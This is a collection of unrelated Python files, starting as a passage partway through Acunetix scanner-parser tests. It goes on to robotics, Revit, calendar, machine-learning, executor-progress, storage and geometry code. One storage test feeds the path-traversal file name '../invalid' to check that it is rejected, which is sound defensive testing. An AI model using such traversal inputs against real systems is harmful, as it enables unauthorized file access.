self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('www.itsecgames.com', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
with self.subTest(i=2):
finding = findings[2]
self.assertEqual("Unencrypted connection (verified)", finding.title)
self.assertEqual("Low", finding.severity)
self.assertEqual(310, finding.cwe)
self.assertEqual(datetime.date(2020, 2, 27), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertEqual("Possible information disclosure.", finding.impact)
# check that this finding have no references
self.assertIsNone(finding.references)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('www.itsec<EMAIL>', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
def test_parse_file_with_example_com(self):
testfile = open("unittests/scans/acunetix/XML_http_example_co_id_.xml")
parser = AcunetixParser()
findings = parser.get_findings(testfile, Test())
for finding in findings:
for endpoint in finding.unsaved_endpoints:
endpoint.clean()
self.assertEqual(7, len(findings))
with self.subTest(i=0):
finding = findings[0]
self.assertEqual("HTML form without CSRF protection", finding.title)
self.assertEqual("Medium", finding.severity)
self.assertEqual(datetime.date(2020, 4, 28), finding.date)
self.assertIsNotNone(finding.description)
self.assertEqual("CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", finding.cvssv3)
self.assertFalse(finding.false_p)
self.assertIn("An attacker could use CSRF to trick a victim into accessing a website hosted by the attacker,", finding.impact)
# aggregated
self.assertEqual(3, finding.nb_occurences)
# check that this finding have references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(3, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('example.co.id', endpoint.host)
self.assertEqual('h/search', endpoint.path)
endpoint = finding.unsaved_endpoints[1]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('example.co.id', endpoint.host)
self.assertEqual('m/zmain', endpoint.path)
# check req/resp
self.assertEqual(3, len(finding.unsaved_req_resp))
for req_resp in finding.unsaved_req_resp:
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
with self.subTest(i=6):
finding = findings[6]
self.assertEqual("Content Security Policy (CSP) not implemented", finding.title)
self.assertEqual("Info", finding.severity)
self.assertEqual(datetime.date(2020, 4, 28), finding.date)
self.assertIsNotNone(finding.description)
self.assertFalse(finding.false_p)
self.assertIn("CSP can be used to prevent and/or mitigate attacks that involve content/code injection,", finding.impact)
# check that this finding have references
self.assertIsNotNone(finding.references)
self.assertGreater(len(finding.references), 0)
# check endpoints
self.assertEqual(1, len(finding.unsaved_endpoints))
endpoint = finding.unsaved_endpoints[0]
self.assertIsNone(endpoint.protocol)
self.assertIsNone(endpoint.port)
self.assertEqual('example.co.id', endpoint.host)
self.assertIsNone(endpoint.path)
# check req/resp
self.assertEqual(1, len(finding.unsaved_req_resp))
req_resp = finding.unsaved_req_resp[0]
self.assertIn('req', req_resp)
self.assertIsNotNone(req_resp['req'])
self.assertIsInstance(req_resp['req'], str)
self.assertIn('resp', req_resp)
self.assertIsNotNone(req_resp['resp'])
self.assertIsInstance(req_resp['resp'], str)
|
68545
|
from compas_fab.backends import RosClient
from helpers import show_trajectory
from compas.geometry import Frame
with RosClient("localhost") as client:
robot = client.load_robot()
group = robot.main_group_name
frames = []
frames.append(Frame((0.3, 0.1, 0.05), (-1, 0, 0), (0, 1, 0)))
frames.append(Frame((0.4, 0.3, 0.05), (-1, 0, 0), (0, 1, 0)))
start_configuration = robot.zero_configuration()
start_configuration.joint_values = (-0.106, 5.351, 2.231, -2.869, 4.712, 1.465)
trajectory = robot.plan_cartesian_motion(frames,
start_configuration,
group=group,
options=dict(
max_step=0.01,
avoid_collisions=True,
))
print("Computed cartesian path with %d configurations, " % len(trajectory.points))
print("following %d%% of requested trajectory." % (trajectory.fraction * 100))
print("Executing this path at full speed would take approx. %.3f seconds." % trajectory.time_from_start)
show_trajectory(trajectory)
|
68608
|
import clr
clr.AddReference('RevitAPI')
from Autodesk.Revit.DB import *
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
refgroup = UnwrapElement(IN[0])
groups = UnwrapElement(IN[1])
# Get Mirrored state of first family instance in reference group instance
refGroupMembers = refgroup.GetMemberIds()
numMembers = len(refGroupMembers)
counter = 0
membernum = None
refGroupType = refgroup.GroupType.Id.IntegerValue
for member in refGroupMembers:
elem = refgroup.Document.GetElement(member)
if elem.GetType().ToString() == "Autodesk.Revit.DB.FamilyInstance":
state = elem.Mirrored
membernum = counter
famtype = elem.GetTypeId().IntegerValue
break
counter += 1
# Default values for flags
refGroupIntact = True
noFamInsts = False
# Set a flag if the reference group contains no family instances
if membernum == None: noFamInsts = True
else:
bools = []
# Compare Mirrored state with corresponding members of other group instances
for group in groups:
# Get number of group members
theseMembers = group.GetMemberIds()
theseMembersNum = len(theseMembers)
# Set a flag if any group instance has more members than the reference group instance
# (only if both are of the same group type)
if theseMembersNum > numMembers and refGroupType == group.GroupType.Id.IntegerValue:
refGroupIntact = False
break
# Return null if group is of another group type
elif refGroupType != group.GroupType.Id.IntegerValue: bools.append(None)
# Return null for group instances with excluded members
elif theseMembersNum < numMembers: bools.append(None)
# Return null if family instance to compare if of a diffent type
elif group.Document.GetElement(theseMembers[membernum]).GetTypeId().IntegerValue != famtype: bools.append(None)
# Otherwise compare Mirrored state
else: bools.append(group.Document.GetElement(theseMembers[membernum]).Mirrored != state)
# Return null for all groups if the first group has excluded members
# or if it does not contain any fanily instances
if not refGroupIntact or noFamInsts: bools = [None] * len(groups)
OUT = bools
|
68643
|
import pytest
from ics import Calendar, ContentLine
def test_gh195_override_prodid():
lines = [
"BEGIN:VCALENDAR",
"VERSION:2.0",
"X-WR-CALNAME:<NAME>",
"X-APPLE-CALENDAR-COLOR:#996633",
"END:VCALENDAR"
]
with pytest.raises(ValueError, match="attribute PRODID is required but got no value"):
Calendar(lines)
calendar = Calendar()
assert calendar.prodid == Calendar.DEFAULT_PRODID
assert ContentLine("PRODID", value=Calendar.DEFAULT_PRODID) in calendar.to_container()
test_prodid = "TEST_PRODID 123456 GitHub Issue 195"
lines.insert(1, "PRODID:" + test_prodid)
calendar = Calendar(lines)
assert calendar.prodid == test_prodid
assert ContentLine("PRODID", value=test_prodid) in calendar.to_container()
|
68716
|
import jittor as jt
import numpy as np
from advance import *
import matplotlib.pyplot as plt
import argparse
import matplotlib.pyplot as plt
from tqdm import trange
from utils import get_model, modelSet, dataset_choices
import argparse
plt.switch_backend('agg')
# CUDA_VISIBLE_DEVICES=0 log_silent=1 python3.7 run_ssl.py --model deeplab --layer aspp --channel 256 --dataset pancreas --save checkpoints/deeplab-ssl.pkl -e 50 --lr 5e-6
if __name__ == '__main__':
jt.flags.use_cuda = int(1)
parser = argparse.ArgumentParser()
parser.add_argument('--model', default='unet', type=str, choices=modelSet, help='choose a model network')
parser.add_argument('--dataset', type=str, choices=dataset_choices, required=True, help='select a dataset')
parser.add_argument('--save', default='checkpoints/ssl.pkl', type=str, help='model weights save path')
parser.add_argument('-e', '--epochs', type=int, default=20, help='number of training epochs', dest='epochs')
parser.add_argument('-c', '--class-num', type=int, default=2, help='class number', dest='class_num')
parser.add_argument('-b', '--batch-size', type=int, default=8, help='training batch size', dest='batch_size')
parser.add_argument('--channel', dest='embedding_channel', type=int, default=512, help='number of channels of embedded feature maps')
parser.add_argument('--layer', type=str, default='down4', help='layer to extract features from')
parser.add_argument('--lr', type=float, default=1e-5, help='learning rate')
parser.add_argument('--pretrain', action='store_true')
args = parser.parse_args()
model = get_model(args)
train_loader = retrieve_aug_data(args, 'train', augmentation)
learner = MoCoLearner(
model=model,
layer=args.layer,
loader=train_loader,
embedding_channel=args.embedding_channel,
project_dim=128,
lr=args.lr
)
loss_min = 1e4
losses = []
with open('./log/ssl.txt', 'w') as f:
# bar = trange(args.epochs)
for epoch in range(args.epochs):
loss = learner.train()
# bar.set_description('epoch[%02d] loss:[%.6f\n]' % (epoch + 1, loss))
print('epoch[%02d] loss:[%.6f\n]' % (epoch + 1, loss))
f.write('epoch[%02d] loss:[%.6f\n]' % (epoch + 1, loss))
if loss < loss_min:
model.save(args.save)
losses.append(loss)
np.savetxt('./log/ssl_loss.txt', loss)
plt.plot(losses)
plt.savefig('./result/ssl_losses.png')
|
68731
|
import logging
import os
import re
import time
from threading import Event, Lock, Thread
import cook.util as cu
class ProgressSequenceCounter:
"""Utility class that supports atomically incrementing the sequence value."""
def __init__(self, initial=0):
self.lock = Lock()
self.value = initial
def increment_and_get(self):
"""Atomically increments by one the current value and returns the new value."""
with self.lock:
self.value += 1
return self.value
class ProgressUpdater(object):
"""This class is responsible for sending progress updates to the scheduler.
It throttles the rate at which progress updates are sent.
"""
def __init__(self, task_id, max_message_length, poll_interval_ms, send_progress_message_fn):
"""
task_id: string
The task id.
max_message_length: int
The allowed max message length after encoding.
poll_interval_ms: int
The interval after which to send a subsequent progress update.
send_progress_message_fn: function(message)
The helper function used to send the progress message.
"""
self.task_id = task_id
self.max_message_length = max_message_length
self.poll_interval_ms = poll_interval_ms
self.last_reported_time = None
self.last_progress_data_sent = None
self.send_progress_message = send_progress_message_fn
self.lock = Lock()
def has_enough_time_elapsed_since_last_update(self):
"""Returns true if enough time (based on poll_interval_ms) has elapsed since
the last progress update (available in last_reported_time).
"""
if self.last_reported_time is None:
return True
else:
current_time = time.time()
time_diff_ms = (current_time - self.last_reported_time) * 1000
return time_diff_ms >= self.poll_interval_ms
def is_increasing_sequence(self, progress_data):
"""Checks if the sequence number in progress_data is larger than the previously published progress.
Parameters
----------
progress_data: dictionary
The progress data to send.
Returns
-------
True if the sequence number in progress_data is larger than the previously published progress, False otherwise
"""
last_progress_data = self.last_progress_data_sent
last_progress_sequence = last_progress_data['progress-sequence'] if last_progress_data else -1
return progress_data['progress-sequence'] > last_progress_sequence
def send_progress_update(self, progress_data, force_send=False):
"""Sends a progress update if enough time has elapsed since the last progress update.
The force_send flag can be used to ignore the check for enough time having elapsed.
Using this method is thread-safe.
Parameters
----------
progress_data: dictionary
The progress data to send.
force_send: boolean, optional
Defaults to false.
Returns
-------
Nothing
"""
with self.lock:
# ensure we do not send outdated progress data due to parallel repeated calls to this method
if progress_data is None or not self.is_increasing_sequence(progress_data):
logging.info('Skipping invalid/outdated progress data {}'.format(progress_data))
elif not force_send and not self.has_enough_time_elapsed_since_last_update():
logging.debug('Not sending progress data as enough time has not elapsed since last update')
else:
logging.info('Sending progress message {}'.format(progress_data))
message_dict = dict(progress_data)
message_dict['task-id'] = self.task_id
raw_progress_message = progress_data['progress-message']
try:
progress_str = raw_progress_message.decode('ascii').strip()
except UnicodeDecodeError:
logging.info('Unable to decode progress message in ascii, using empty string instead')
progress_str = ''
if len(progress_str) <= self.max_message_length:
message_dict['progress-message'] = progress_str
else:
allowed_progress_message_length = max(self.max_message_length - 3, 0)
new_progress_str = progress_str[:allowed_progress_message_length].strip() + '...'
logging.info('Progress message trimmed to {}'.format(new_progress_str))
message_dict['progress-message'] = new_progress_str
send_success = self.send_progress_message(message_dict)
if send_success:
self.last_progress_data_sent = progress_data
self.last_reported_time = time.time()
else:
logging.info('Unable to send progress message {}'.format(message_dict))
class ProgressWatcher(object):
"""This class tails the output from the target file listening for progress messages.
The retrieve_progress_states generates all progress messages iteratively.
"""
def __init__(self, output_name, location_tag, sequence_counter, max_bytes_read_per_line, progress_regex_string,
stop_signal, task_completed_signal, progress_termination_signal):
"""The ProgressWatcher constructor.
Parameters
----------
progress_regex_string: string
The progress regex to match against, it must return one or two capture groups.
The first capture group represents the progress percentage.
The second capture group, if present, represents the progress message.
"""
self.target_file = output_name
self.location_tag = location_tag
self.sequence_counter = sequence_counter
self.max_bytes_read_per_line = max_bytes_read_per_line
self.progress_regex_string = progress_regex_string
self.progress_regex_pattern = re.compile(progress_regex_string.encode())
self.progress = None
self.stop_signal = stop_signal
self.task_completed_signal = task_completed_signal
self.progress_termination_signal = progress_termination_signal
def current_progress(self):
"""Returns the current progress dictionary."""
return self.progress
def tail(self, sleep_time_ms):
"""This method incrementally generates lines from a file by waiting for new content from a file.
It behaves like the 'tail -f' shell command.
Parameters
----------
sleep_time_ms: int
The unit of time in ms to repetitively sleep when the file has not been created or no new
content is available in the file being tailed.
Returns
-------
an incrementally generated list of lines in the file being tailed.
"""
try:
sleep_param = sleep_time_ms / 1000
if os.path.exists(self.target_file) and not os.path.isfile(self.target_file):
logging.info('Skipping progress monitoring on %s as it is not a file', self.target_file)
return
if not os.path.isfile(self.target_file):
logging.debug('Awaiting creation of file %s [tag=%s]', self.target_file, self.location_tag)
while not os.path.isfile(self.target_file) and not self.task_completed_signal.isSet():
time.sleep(sleep_param)
if not os.path.isfile(self.target_file):
logging.info('Progress output file has not been created [tag=%s]', self.location_tag)
return
if self.stop_signal.isSet():
logging.info('Parsing progress messages interrupted [tag=%s]', self.location_tag)
return
logging.info('File has been created, reading contents [tag=%s]', self.location_tag)
linesep_bytes = os.linesep.encode()
fragment_index = 0
line_index = 0
def log_tail_summary():
log_message = '%s fragments and %s lines read while processing progress messages [tag=%s]'
logging.info(log_message, fragment_index, line_index, self.location_tag)
with open(self.target_file, 'rb') as target_file_obj:
while not self.stop_signal.isSet():
if self.progress_termination_signal.isSet():
logging.info('tail short-circuiting due to progress termination [tag=%s]', self.location_tag)
log_tail_summary()
break
line = target_file_obj.readline(self.max_bytes_read_per_line)
if not line:
# exit if program has completed and there are no more lines to read
if self.task_completed_signal.isSet():
log_tail_summary()
break
# no new line available, sleep before trying again
time.sleep(sleep_param)
continue
fragment_index += 1
if line.endswith(linesep_bytes):
line_index += 1
yield line
if self.stop_signal.isSet() and not self.task_completed_signal.isSet():
logging.info('Task requested to be killed, may not have processed all progress messages')
except Exception as exception:
logging.exception('Error while tailing %s [tag=%s]', self.target_file, self.location_tag)
raise exception
def match_progress_update(self, input_data):
"""Returns the progress tuple when the input string matches the provided regex.
Parameters
----------
input_data: bytes
The input data.
Returns
-------
the tuple (percent, message) if the string matches the provided regex,
else return None.
"""
matches = self.progress_regex_pattern.findall(input_data)
return matches[0] if len(matches) >= 1 else None
def __update_progress(self, progress_report):
"""Updates the progress field with the data from progress_report if it is valid."""
if isinstance(progress_report, tuple) and len(progress_report) == 2:
percent_data, message_data = progress_report
elif isinstance(progress_report, tuple) and len(progress_report) == 1:
percent_data, message_data = progress_report[0], b''
else:
percent_data, message_data = progress_report, b''
percent_float = float(percent_data.decode())
if percent_float < 0 or percent_float > 100:
logging.info('Skipping "%s" as the percent is not in [0, 100]', progress_report)
return False
percent_int = int(round(percent_float))
logging.debug('Updating progress to %s percent [tag=%s]', percent_int, self.location_tag)
self.progress = {'progress-message': message_data,
'progress-percent': percent_int,
'progress-sequence': self.sequence_counter.increment_and_get()}
return True
def retrieve_progress_states(self):
"""Generates the progress states by tailing the target_file.
It tails a target file (using the tail() method) and uses the provided
regex to find a match for a progress message. The regex is expected to
generate two components in the match: the progress percent as an int and
a progress message string. When such a message is found, this method
yields the current progress as a dictionary.
Note: This function must rethrow any OSError exceptions that it encounters.
Returns
-------
An incrementally generated list of progress states.
"""
last_unprocessed_report = None
if self.progress_regex_string:
sleep_time_ms = 50
for line in self.tail(sleep_time_ms):
try:
progress_report = self.match_progress_update(line)
if progress_report is not None:
if self.task_completed_signal.isSet():
last_unprocessed_report = progress_report
elif self.__update_progress(progress_report):
yield self.progress
except Exception as exception:
if cu.is_out_of_memory_error(exception):
raise exception
else:
logging.exception('Skipping "%s" as a progress entry', line)
if last_unprocessed_report is not None:
if self.__update_progress(last_unprocessed_report):
yield self.progress
class ProgressTracker(object):
"""Helper class to track progress messages from the specified location."""
def __init__(self, config, stop_signal, task_completed_signal, counter, progress_updater,
progress_termination_signal, location, location_tag, os_error_handler):
"""Launches the threads that track progress and send progress updates to the driver.
Parameters
----------
config: cook.config.ExecutorConfig
The current executor config.
stop_signal: threading.Event
Event that determines if an interrupt was sent
task_completed_signal: threading.Event
Event that tracks task execution completion
progress_updater: ProgressUpdater
The progress updater used to send the progress messages
counter: ProgressSequenceCounter
The sequence counter
location: string
The target location to read for progress messages
location_tag: string
A tag to identify the target location.
os_error_handler: fn(os_error)
OSError exception handler for out of memory situations."""
self.location_tag = location_tag
self.os_error_handler = os_error_handler
self.progress_complete_event = Event()
self.watcher = ProgressWatcher(location, location_tag, counter, config.max_bytes_read_per_line,
config.progress_regex_string, stop_signal, task_completed_signal,
progress_termination_signal)
self.updater = progress_updater
def start(self):
"""Launches a thread that starts monitoring the progress location for progress messages."""
logging.info('Starting progress monitoring from [tag=%s]', self.location_tag)
tracker_thread = Thread(target=self.track_progress, args=())
tracker_thread.daemon = True
tracker_thread.start()
def wait(self, timeout=None):
"""Waits for the progress tracker thread to run to completion."""
self.progress_complete_event.wait(timeout=timeout)
if self.progress_complete_event.isSet():
logging.info('Progress monitoring complete [tag=%s]', self.location_tag)
else:
logging.info('Progress monitoring did not complete [tag=%s]', self.location_tag)
def track_progress(self):
"""Retrieves and sends progress updates using send_progress_update_fn.
It sets the progress_complete_event before returning."""
try:
for current_progress in self.watcher.retrieve_progress_states():
self.updater.send_progress_update(current_progress)
except Exception as exception:
if cu.is_out_of_memory_error(exception):
self.os_error_handler(exception)
else:
logging.exception('Exception while tracking progress [tag=%s]', self.location_tag)
finally:
self.progress_complete_event.set()
def force_send_progress_update(self):
"""Retrieves the latest progress message and attempts to force send it to the scheduler."""
latest_progress = self.watcher.current_progress()
self.updater.send_progress_update(latest_progress, force_send=True)
|
68794
|
import sys
import inspect
import threading
#import logging
class logging:
@staticmethod
def debug( msg ):
print( msg, file=sys.stderr)
def format_frame( frame ):
return '{}:{} {}'.format( *[str(getattr(frame, a)) for a in ('filename', 'lineno', 'function')] )
# Class to wrap Lock and simplify logging of lock usage
class Lock:
"""
Wraps a standard Lock, so that attempts to use the
lock according to its API are logged for debugging purposes
"""
def __init__(self, name=None, log=None):
self.lock = threading.Lock()
self.do_init( name, log )
self.log.debug("{0} created {1}".format(self.context(), self.name))
def do_init( self, name=None, log=None ):
self.name = str(name)
self.log = log or logging
def acquire(self, blocking=True):
self.log.debug("{0} ---- trying to acquire {1}".format( self.context(), self.name))
for f in self.print_stack():
self.log.debug( f )
ret = self.lock.acquire(blocking)
if ret == True:
self.log.debug("{0} **** acquired {1}".format(
self.context(), self.name))
else:
self.log.debug("{0} **** non-blocking acquire of {1} lock failed".format(
self.context(), self.name))
return ret
def print_stack( self ):
stack = inspect.stack()
return [format_frame(frame) for frame in reversed(stack)]
def context( self ):
return format_frame( inspect.stack()[3] )
def release(self):
self.log.debug("{0} vvvv releasing {1}".format(self.context(), self.name))
self.lock.release()
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
return False # Do not swallow exceptions
class RLock(Lock):
"""
Wraps a standard RLock, so that attempts to use the
lock according to its API are logged for debugging purposes
"""
def __init__(self, name=None, log=None):
self.lock = threading.RLock()
self.do_init( name, log )
self.log.debug("{0} created {1}".format(self.context(), self.name))
|
68800
|
import numpy
import six
from chainer.backends import cuda
from chainer.backends import intel64
from chainer import function_node
from chainer.utils import type_check
def _cu_conv_sum(y, x, n):
# Convolutional sum
# TODO(beam2d): Use scan computation
rdim = x.size // (x.shape[0] * x.shape[1])
cuda.elementwise(
'raw T x, int32 rdim, int32 N, int32 n_', 'raw T y',
'''
int half_n = n_ / 2;
int offset = i / rdim * N * rdim + i % rdim;
float sum_part = 0;
for (int j = 0; j < N + half_n; ++j) {
if (j < N) {
sum_part += x[offset + j * rdim];
}
if (j >= n_) {
sum_part -= x[offset + (j - n_) * rdim];
}
if (j >= half_n) {
y[offset + (j - half_n) * rdim] = sum_part;
}
}
''', 'lrn_conv_sum')(x, rdim, x.shape[1], n, y,
size=x.shape[0] * rdim)
class LocalResponseNormalization(function_node.FunctionNode):
"""Cross-channel normalization function used in AlexNet."""
_use_ideep = False
def __init__(self, n=5, k=2, alpha=1e-4, beta=.75):
self.n = n
self.k = k
self.alpha = alpha
self.beta = beta
self.scale = None
self.indexes = None
self.unit_scale = None
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 1)
x_type, = in_types
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim >= 2,
)
def forward_cpu(self, inputs):
if (intel64.should_use_ideep('>=auto')
and intel64.inputs_all_ready(inputs, (4,))):
self._use_ideep = True
return self.forward_ideep(inputs)
x, = inputs
self.retain_inputs((0,))
self.retain_outputs((0,))
half_n = self.n // 2
x2 = numpy.square(x)
sum_part = x2.copy()
for i in six.moves.range(1, half_n + 1):
sum_part[:, i:] += x2[:, :-i]
sum_part[:, :-i] += x2[:, i:]
self.unit_scale = self.k + self.alpha * sum_part
self.scale = self.unit_scale ** -self.beta
y = x * self.scale
return y,
def forward_ideep(self, inputs):
x, = inputs
self.retain_inputs((0,))
self.retain_outputs((0,))
param = intel64.ideep.localResponseNormalizationParam(
self.n, self.k, self.n * self.alpha, self.beta,
intel64.ideep.localResponseNormalizationParam.lrn_across_channels)
y, indexes = intel64.ideep.localResponseNormalization.Forward(
intel64.ideep.array(x), param)
self.indexes = indexes
return y,
def forward_gpu(self, inputs):
x, = inputs
self.retain_inputs((0,))
self.retain_outputs((0,))
self.y = cuda.cupy.square(x) # temporary
self.scale = cuda.cupy.empty_like(self.y)
_cu_conv_sum(self.scale, self.y, self.n)
cuda.elementwise(
'T x, T k, T alpha, T beta',
'T y, T scale',
'''scale = k + alpha * scale;
y = x * pow(scale, -beta);''',
'lrn_fwd')(x, self.k, self.alpha, self.beta,
self.y, self.scale)
return self.y,
def backward(self, indexes, grad_outputs):
x, = self.get_retained_inputs()
y, = self.get_retained_outputs()
gy, = grad_outputs
f = LocalResponseNormalizationGrad(
self.n, self.k, self.alpha, self.beta, self._use_ideep,
self.scale, self.indexes, self.unit_scale,)
return f.apply((x, y, gy))
class LocalResponseNormalizationGrad(function_node.FunctionNode):
def __init__(self, n, k, alpha, beta, use_ideep,
scale=None, indexes=None, unit_scale=None):
self.n = n
self.k = k
self.alpha = alpha
self.beta = beta
self._use_ideep = use_ideep
self.scale = scale
self.indexes = indexes
self.unit_scale = unit_scale
def forward_cpu(self, inputs):
if self._use_ideep:
return self._backward_ideep(inputs)
x, y, gy = inputs
half_n = self.n // 2
summand = y * gy / self.unit_scale
sum_part = summand.copy()
for i in six.moves.range(1, half_n + 1):
sum_part[:, i:] += summand[:, :-i]
sum_part[:, :-i] += summand[:, i:]
gx = gy * self.scale - 2 * self.alpha * self.beta * x * sum_part
return gx,
def _backward_ideep(self, inputs):
x, y, gy = inputs
param = intel64.ideep.localResponseNormalizationParam(
self.n, self.k, self.n * self.alpha, self.beta,
intel64.ideep.localResponseNormalizationParam.lrn_across_channels
)
gx = intel64.ideep.localResponseNormalization.Backward(
intel64.ideep.array(x),
intel64.ideep.array(gy),
self.indexes,
param)
return gx,
def forward_gpu(self, inputs):
x, y, gy = inputs
summand = cuda.elementwise(
'T scale, T y, T gy', 'T summand',
'summand = y * gy / scale',
'lrn_bwd_summand')(self.scale, y, gy)
gx = cuda.cupy.empty_like(x)
_cu_conv_sum(gx, summand, self.n)
cuda.elementwise(
' T x, T gy, T scale, T beta, T coeff', 'T gx',
'gx = pow(scale, -beta) * gy - coeff * x * gx',
'lrn_bwd')(x, gy, self.scale,
self.beta, 2 * self.alpha * self.beta, gx)
return gx,
def backward(self, indexes, grad_outputs):
# No trivial way to implement double-backward for this function.
raise NotImplementedError
def local_response_normalization(x, n=5, k=2, alpha=1e-4, beta=.75):
"""Local response normalization across neighboring channels.
This function implements normalization across channels. Let :math:`x` an
input image with :math:`N` channels. Then, this function computes an output
image :math:`y` by following formula:
.. math::
y_i = {x_i \\over \\left( k + \\
\\alpha \\sum_{j=\\max{1, i - n/2}}^{\\min{N, i + n/2}} \\
x_j^2 \\right)^\\beta}.
Args:
x (:class:`~chainer.Variable` or :ref:`ndarray`): Input variable.
n (int): Normalization window width.
k (float): Smoothing parameter.
alpha (float): Normalizer scaling parameter.
beta (float): Normalizer power parameter.
Returns:
~chainer.Variable: Output variable.
See: Section 3.3 of `ImageNet Classification with Deep Convolutional
Neural Networks <https://www.cs.toronto.edu/~fritz/absps/imagenet.pdf>`_
"""
return LocalResponseNormalization(n, k, alpha, beta).apply((x,))[0]
|
68842
|
import pytest
from bepasty.storage.filesystem import Storage
def test_contains(tmpdir):
storage = Storage(str(tmpdir))
name = "foo"
# check if it is not there yet
assert name not in storage
with storage.create(name, 0):
# we just want it created, no need to write sth into it
pass
# check if it is there
assert name in storage
storage.remove(name)
# check if it is gone
assert name not in storage
def test_iter(tmpdir):
storage = Storage(str(tmpdir))
# nothing there yet
assert list(storage) == []
names = ["foo", "bar", "baz", ]
for name in names:
with storage.create(name, 0):
# we just want it created, no need to write sth into it
pass
assert set(list(storage)) == set(names)
def test_invalid_name(tmpdir):
storage = Storage(str(tmpdir))
name = "../invalid"
with pytest.raises(RuntimeError):
storage.create(name, 0)
|
68844
|
from django.conf.urls.defaults import *
urlpatterns = patterns('',
url(r'^login/$', 'authsub.views.login', name="authsub_login"),
)
|
68885
|
from __future__ import absolute_import
import pkg_resources
__version__ = '0.3.0'
BASE_JAR = "pyleus-base.jar"
BASE_JAR_PATH = pkg_resources.resource_filename('pyleus', BASE_JAR)
|
68904
|
RTL_LANGUAGES = {
'he', 'ar', 'arc', 'dv', 'fa', 'ha',
'khw', 'ks', 'ku', 'ps', 'ur', 'yi',
}
COLORS = {
'primary': '#0d6efd', 'blue': '#0d6efd', 'secondary': '#6c757d',
'success': '#198754', 'green': '#198754', 'danger': '#dc3545',
'red': '#dc3545', 'warning': '#ffc107', 'yellow': '#ffc107',
'info': '#0dcaf0', 'cyan': '#0dcaf0', 'gray': '#adb5bd',
'dark': '#000', 'black': '#000', 'white': '#fff',
'teal': '#20c997', 'orange': '#fd7e14', 'pink': '#d63384',
'purple': '#6f42c1', 'indigo': '#6610f2', 'light': '#f8f9fa',
}
DEFAULT_ASSESSMENT_BUTTON_COLOR = '#0d6efd' # primary
DEFAULT_ASSESSMENT_BUTTON_ACTIVE_COLOR = '#fff' # white
|
68908
|
from shapely.geometry import Point, MultiPoint, Polygon, MultiPolygon
from shapely.ops import cascaded_union, polygonize
from shapely.prepared import prep
from rtree import Rtree
import sys, random, json, numpy, math, pickle, os
SAMPLE_ITERATIONS = 200
SAMPLE_SIZE = 5
MEDIAN_THRESHOLD = 5.0
median_distance_cache = {}
def median_distances(pts, aggregate=numpy.median):
key = tuple(sorted(pts))
if key in median_distance_cache: return median_distance_cache[key]
median = (numpy.median([pt[0] for pt in pts]),
numpy.median([pt[1] for pt in pts]))
distances = []
for pt in pts:
dist = math.sqrt(((median[0]-pt[0])*math.cos(median[1]*math.pi/180.0))**2+(median[1]-pt[1])**2)
distances.append((dist, pt))
median_dist = aggregate([dist for dist, pt in distances])
median_distance_cache[key] = (median_dist, distances)
return (median_dist, distances)
def mean_distances(pts):
return median_distances(pts, numpy.mean)
name_file, point_file = sys.argv[1:3]
places = {}
names = {}
if os.path.exists(point_file + '.cache'):
print >>sys.stderr, "Reading from %s cache..." % point_file
names, places = pickle.load(file(point_file + ".cache"))
else:
all_names = {}
count = 0
for line in file(name_file):
place_id, name = line.strip().split(None, 1)
all_names[int(place_id)] = name
count += 1
if count % 1000 == 0:
print >>sys.stderr, "\rRead %d names from %s." % (count, name_file),
print >>sys.stderr, "\rRead %d names from %s." % (count, name_file)
count = 0
for line in file(point_file):
place_id, lon, lat = line.strip().split()
place_id = int(place_id)
names[place_id] = all_names.get(place_id, "")
point = (float(lon), float(lat))
pts = places.setdefault(place_id, set())
pts.add(point)
count += 1
if count % 1000 == 0:
print >>sys.stderr, "\rRead %d points in %d places." % (count, len(places)),
print >>sys.stderr, "\rRead %d points in %d places." % (count, len(places))
count = 0
discarded = 0
for place_id, pts in places.items():
count += 1
print >>sys.stderr, "\rComputing outliers for %d of %d places..." % (count, len(places)),
median_dist, distances = median_distances(pts)
keep = [pt for dist, pt in distances if dist < median_dist * MEDIAN_THRESHOLD]
discarded += len(pts) - len(keep)
places[place_id] = keep
print >>sys.stderr, "%d points discarded." % discarded
if not os.path.exists(point_file + '.cache'):
print >>sys.stderr, "Caching points..."
pickle.dump((names, places), file(point_file + ".cache", "w"), -1)
print >>sys.stderr, "Indexing..."
points = []
place_list = set()
